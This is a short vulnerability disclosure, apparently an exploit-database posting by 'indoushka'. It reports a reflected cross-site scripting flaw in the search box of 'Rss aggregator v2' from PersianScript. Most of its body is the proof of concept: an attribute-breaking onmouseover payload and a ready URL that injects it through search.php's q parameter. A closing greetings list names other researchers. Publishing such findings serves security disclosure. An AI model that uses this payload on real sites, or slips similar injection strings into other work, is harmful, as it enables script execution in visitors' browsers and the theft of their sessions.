===================================================
| # Title : Rss aggregator v2 Xss Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Français V.(Pro)
| # Vendor : http://www.PersianScript.ir
===================================================
Poc :
[+] in search box Use Payload : " onmouseover%3dprompt(921028) bad%3d"
http://127.0.0.1/search.php?q=1%22%20onmouseover%3dprompt%28921028%29%20bad%3d%22
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * 9aylas * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================